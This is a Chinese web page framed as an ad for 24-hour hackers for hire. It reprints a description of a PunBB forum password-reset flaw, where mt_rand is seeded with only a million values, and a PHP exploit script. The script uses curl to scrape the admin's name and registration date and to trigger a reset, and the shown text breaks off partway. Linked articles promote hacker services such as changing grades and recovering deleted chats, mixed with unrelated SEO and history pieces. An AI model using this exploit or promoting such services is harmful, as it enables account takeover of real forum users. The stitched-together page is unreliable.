怎么找 *** 黑客接单(24小时接单的黑客

访客4年前黑客资讯754

PunBB是一款基于PHP的论坛程序。 

PunBB的口令重置功能实现上存在漏洞,远程攻击者可能利用此漏洞在特定条件重置用户的口令。 
如果用户忘记了口令的话,可使用PunBB的口令重置功能重置。在请求口令重置后,论坛会向用户发送一封邮件,包含有一个新的随机口令以及激活链接,用户必须点击这个链接才能使口令更改生效。 
PunBB的口令重置功能使用mt_rand()生成新口令和激活链接,但在初始化马特赛特旋转演算法随机数生成器时使用了0到1,000,000之间的随机数,具体取决于当前的微秒,也就是只有100万个可能的新口令和激活链接。攻击者可以暴力猜测这个有限的区域,判断重置的口令并激活。 

<?php 
/** 
* Original : http://www.winshell.cn/2008-01.txt 
* Thanks to Stefan Esser, here's the exploit. 

* Team : EpiBite 
* firefox, petit-poney, thot 
* Nous tenons a remercier nos mamans et papas respectifs. 
* Let's get a fu*** coffee ! 
*/ 

// conf 
define('URL', 'http://localhost/punbb_1-2-16_fr/upload'); // base url 
define('EMAIL', 'login_x@epitech.net'); // your email 
define('LOGIN', 'login_x'); // your login 
define('PASS', '620553.8I73'); // your pass 
// Exploit 
printf("--\nUrl : %s\nEmail : %s\n--\n", URL, EMAIL); 
$h = curl_init(); 
curl_setopt($h, CURLOPT_URL, 
URL.'/userlist.php?username=&show_group=-1&sort_by=registered&sort_dir=ASC&search=Envoyer'); 
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1); 
$s = curl_exec($h); 
preg_match('/profile\.php\?id=([0-9]*)">([^<]*)', $s, $m); 
define('ADMIN', $m[2]); 
preg_match('/

([0-9]{4})-([0-9]{2})-([0-9]{2})<\/td/', $s, $m); 
if (count($m)) 
define('DATE', mktime(0, 0, 0, $m[2], $m[3], $m[1])); 
else 
define('DATE', time() - 86400); //just in case, the forum or account just has been created 
printf("Admin : %s\nDate : %s\n--\n", ADMIN, DATE); 
$h = curl_init(); 
curl_setopt($h, CURLOPT_URL, URL.'/login.php?action=forget_2'); 
// curl_setopt($h, CURLOPT_PROXY, 'proxies.epitech.net:3128'); 
curl_setopt($h, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($h, CURLOPT_HEADER, 1); 
curl_setopt($h, CURLOPT_POST, 1); 
curl_setopt($h, CURLOPT_POSTFIELDS, implode('&', array('form_sent=1', 
'req_email='.urlencode(EMAIL), 
'request_pass=Envoyer'))); 
preg_match('/mailto:([^"]*)"/', curl_exec($h), $m); 
define('ADMIN_MAIL', $m[1]); // Admin email (normally automatically get, set manually if there's problem) 
printf("Admin mail : %s\n--\n", ADMIN_MAIL); 

相关文章

黑客技术信息化流动代码雨(黑客效果代码)

黑客技术信息化流动代码雨(黑客效果代码)

本文目录一览: 1、黑客帝国数字雨使用CMD命令 2、黑客帝国数字雨图片怎么做 用什么软件做 菜鸟请教高人谢谢咯 还有就是怎么做动态的 3、如何实现c语言程序各颜色数字雨代码 4、黑客帝国...

什么是“金字塔原理”对SEO有用吗?

什么是“金字塔原理”对SEO有用吗?

对付搜索引擎优化,按照我们多年的履历,我们会发明,对付企业网站,他们在筹划整个站点时并没有从逻辑布局上深入思量,譬喻:我的行业百科全书或新闻信息应该如安在我的产物页面上事情,而是常常从感情的角度,来构...

抖音黑客代码教程简单(黑客入门新手教程代码)-1幸运飞艇黑客大神

抖音黑客代码教程简单(黑客入门新手教程代码)-1幸运飞艇黑客大神

抖音黑客代码教程简单(黑客入门新手教程代码)(tiechemo.com)一直致力于黑客(HACK)技术、黑客QQ群、信息安全、web安全、渗透运维、黑客工具、找黑客、黑客联系方式、24小时在线网络黑客...

新三国郭嘉(三国武将排行)

而且在最近的很多 三国影视作品里,贾诩的主戏渐渐地提升,他也肩负了一个很重要的位置,因而 他也是贾诩积累的一定粉丝。那为什么贾诩才37岁就逝世?贾诩不幸身亡的真正原因是什么?贾诩自小谋定后动,感觉汉未...

淘宝找黑客改成绩(联系24小时接单黑客帮忙)

淘宝找黑客改成绩(联系24小时接单黑客帮忙)

1.2. 总结 总之是个让你更快开发的工具,支持java,python,对 SpringBoot,TensorFlow,JFinal, Android 等编程场景进行了特殊适配。当然缺点就是免...

如何查询老板QQ已删聊天记录

孩子也会有不良情绪,当面对孩子的抱怨,父母要耐心倾听,去从孩子的角度考虑问题,慢慢引导,毕竟当孩子愿意和父母抱怨也是一件好事,那么,父母应该怎么应对孩子的抱怨?下面好技术小编就来说说。 孩子对父母抱...